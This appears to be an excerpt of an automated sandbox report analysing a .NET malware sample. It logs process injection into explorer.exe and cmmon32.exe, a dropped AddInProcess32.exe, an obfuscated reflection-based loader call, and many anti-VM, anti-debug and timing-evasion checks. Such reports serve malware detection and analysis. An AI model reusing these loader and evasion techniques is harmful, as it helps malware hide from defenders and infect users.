          Source: C:\Windows\explorer.exeSection loaded: srchadmin.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: synccenter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: imapi2.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: settingsync.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: settingsynccore.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: VFylJFPzqX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: VFylJFPzqX.exeStatic file information: File size 1085440 > 1048576
          Source: VFylJFPzqX.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000003.00000000.1427689911.0000000000CC2000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000004.00000002.2373426103.00000000106CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2664288495.0000000002678000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2669741591.000000000489F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.2679117867.000000000A6FF000.00000004.80000000.00040000.00000000.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: cmmon32.pdb source: AddInProcess32.exe, 00000003.00000002.1519369707.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000003.00000002.1519293726.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.2660330893.00000000001F0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: AddInProcess32.exe, 00000003.00000002.1519369707.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000003.00000002.1519293726.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2660330893.00000000001F0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2668080386.0000000004350000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2668080386.00000000044EE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1519005091.0000000003FFE000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1520648011.00000000041A0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.2668080386.0000000004350000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2668080386.00000000044EE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1519005091.0000000003FFE000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1520648011.00000000041A0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000003.00000000.1427689911.0000000000CC2000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000004.00000002.2373426103.00000000106CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2664288495.0000000002678000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2669741591.000000000489F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.2679117867.000000000A6FF000.00000004.80000000.00040000.00000000.sdmp, AddInProcess32.exe.0.dr

          Data Obfuscation

          Source: Yara match | File source: 0.2.VFylJFPzqX.exe.35a2f70.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.VFylJFPzqX.exe.55f0000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.VFylJFPzqX.exe.35a2f70.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.VFylJFPzqX.exe.55f0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000000.00000002.1486863721.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1471351039.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1485081729.0000000003571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: VFylJFPzqX.exe PID: 7764, type: MEMORYSTR
          Source: VFylJFPzqX.exe, Ss9.cs | .Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(NewLateBinding.LateGet(Ck08, (Type)null, "GetTypes", new object[1] { 24 }, (string[])null, (Type[])null, (bool[])null), (Type)null, "GetMethod", new object[1] { k5M7.Substring(3, 7) }, (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[2]{null,new object[0]}, (string[])null, (Type[])null, (bool[])null, true)
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Code function: 0_2_05E759E5 push esp; retf 0_2_05E759E6
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Code function: 0_2_05E75970 push eax; retf 0_2_05E75971
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Code function: 0_2_05E75B51 pushad ; retf 0_2_05E75B52
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Code function: 0_2_073C5E20 push edx; iretd 0_2_073C5E21
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0041D4D2 push eax; ret 3_2_0041D4D8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0041D4DB push eax; ret 3_2_0041D542
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0041D485 push eax; ret 3_2_0041D4D8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0041D53C push eax; ret 3_2_0041D542
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0179225F pushad ; ret 3_2_017927F9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017927FA pushad ; ret 3_2_017927F9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_017C09AD push ecx; mov dword ptr [esp], ecx 3_2_017C09B6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_0179283D push eax; iretd 3_2_01792858
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 3_2_01791368 push eax; iretd 3_2_01791369
          Source: C:\Windows\explorer.exe | Code function: 4_2_104269B5 push esp; retn 0000h 4_2_10426AE7
          Source: C:\Windows\explorer.exe | Code function: 4_2_10426B02 push esp; retn 0000h 4_2_10426B03
          Source: C:\Windows\explorer.exe | Code function: 4_2_10426B1E push esp; retn 0000h 4_2_10426B1F
          Source: C:\Windows\explorer.exe | Code function: 4_2_10F789B5 push esp; retn 0000h 4_2_10F78AE7
          Source: C:\Windows\explorer.exe | Code function: 4_2_10F78B1E push esp; retn 0000h 4_2_10F78B1F
          Source: C:\Windows\explorer.exe | Code function: 4_2_10F78B02 push esp; retn 0000h 4_2_10F78B03
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_001F74CD push ecx; ret 5_2_001F74E0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043527FA pushad ; ret 5_2_043527F9
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0435225F pushad ; ret 5_2_043527F9
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_0435283D push eax; iretd 5_2_04352858
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_043809AD push ecx; mov dword ptr [esp], ecx 5_2_043809B6
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_024AD4DB push eax; ret 5_2_024AD542
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_024AD4D2 push eax; ret 5_2_024AD4D8
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_024AD485 push eax; ret 5_2_024AD4D8
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_024AD53C push eax; ret 5_2_024AD542
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_024ADC8C push ss; retf 5_2_024ADC8D
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_041FE9B5 push esp; retn 0000h 5_2_041FEAE7
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_041FEB1E push esp; retn 0000h 5_2_041FEB1F
          Source: VFylJFPzqX.exe | Static PE information: section name: .text entropy: 6.889045730769205
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe | File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Users\user\Desktop\VFylJFPzqX.exe File opened: C:\Users\user\Desktop\VFylJFPzqX.exe\:Zone.Identifier read attributes | delete
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara matchFile source: Process Memory Space: VFylJFPzqX.exe PID: 7764, type: MEMORYSTR
          Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 2499904 second address: 249990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 2499B7E second address: 2499B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: C30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: 23F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: 7C70000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: 8C70000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: 8E40000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: 9E40000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: A220000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: B220000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: C220000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1769Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8165Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 873Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeWindow / User API: threadDelayed 9828Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 432
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 424
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 1.8 %
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe TID: 7916Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe TID: 7784Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1296Thread sleep count: 1769 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1296Thread sleep time: -3538000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1296Thread sleep count: 8165 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1296Thread sleep time: -16330000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 7264Thread sleep count: 142 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 7264Thread sleep time: -284000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 7264Thread sleep count: 9828 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 7264Thread sleep time: -19656000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000002.2364455621.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
          Source: VFylJFPzqX.exe, 00000000.00000002.1486863721.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, VFylJFPzqX.exe, 00000000.00000002.1485081729.0000000003571000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
          Source: explorer.exe, 00000010.00000003.2379225682.00000000091C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: VFylJFPzqX.exe, 00000000.00000002.1485081729.0000000003571000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
          Source: explorer.exe, 00000010.00000003.2375541043.0000000004FC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}PO
          Source: explorer.exe, 00000010.00000002.2676388545.000000000954C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00+# cp
          Source: explorer.exe, 00000010.00000002.2676388545.0000000009194000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdWndClassiverStore\en\volume.inf_loc
          Source: explorer.exe, 00000010.00000002.2670266703.0000000004FA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000010.00000003.2490095914.000000000C9AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000004.00000002.2359671123.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
          Source: explorer.exe, 00000004.00000002.2363894406.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2438311102.00000000092D2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.000000000941B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.000000000929C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.00000000093CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000N%\
          Source: explorer.exe, 00000010.00000003.2491757519.000000000C9EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963H
          Source: explorer.exe, 00000004.00000000.1465481958.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000010.00000002.2676388545.0000000009465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000=
          Source: explorer.exe, 00000010.00000002.2670266703.0000000004FA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 00000004.00000000.1465481958.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
          Source: explorer.exe, 00000004.00000002.2359671123.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000003.2284166438.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@v
Source: explorer.exe, 00000010.00000003.2516098392.000000000C9C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963H
Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}t
Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\{~2e
Source: explorer.exe, 00000010.00000002.2660398665.0000000001321000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXTerVMWare
Source: explorer.exe, 00000010.00000002.2676388545.0000000009194000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}(
Source: explorer.exe, 00000010.00000002.2676388545.0000000009277000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00
Source: explorer.exe, 00000010.00000003.2375541043.0000000004FC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: explorer.exe, 00000010.00000002.2676388545.000000000954C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000010.00000003.2516098392.000000000C9C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\9507et
Source: explorer.exe, 00000010.00000002.2676388545.0000000009194000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000-
Source: explorer.exe, 00000010.00000002.2683122014.000000000C8DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}-
Source: explorer.exe, 00000010.00000002.2660398665.0000000001321000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000010.00000002.2683122014.000000000C8DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000003.2520830793.000000000C9C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\0
Source: explorer.exe, 00000004.00000002.2359671123.0000000000A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\VFylJFPzqX.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process queried: DebugPort
Source: C:\Windows\explorer.exe Process queried: DebugPort
Source: C:\Windows\explorer.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 3_2_00409AB0 rdtsc 3_2_00409AB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 3_2_0040ACF0 LdrLoadDll, 3_2_0040ACF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 3_2_01800185 mov eax, dword ptr fs:[00000030h] 3_2_01800185
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 3_2_01864180 mov eax, dword ptr fs:[00000030h] 3_2_01864180
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 3_2_01864180 mov eax, dword ptr fs:[00000030h] 3_2_01864180
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 3_2_0187C188 mov eax, dword ptr fs:[00000030h] 3_2_0187C188
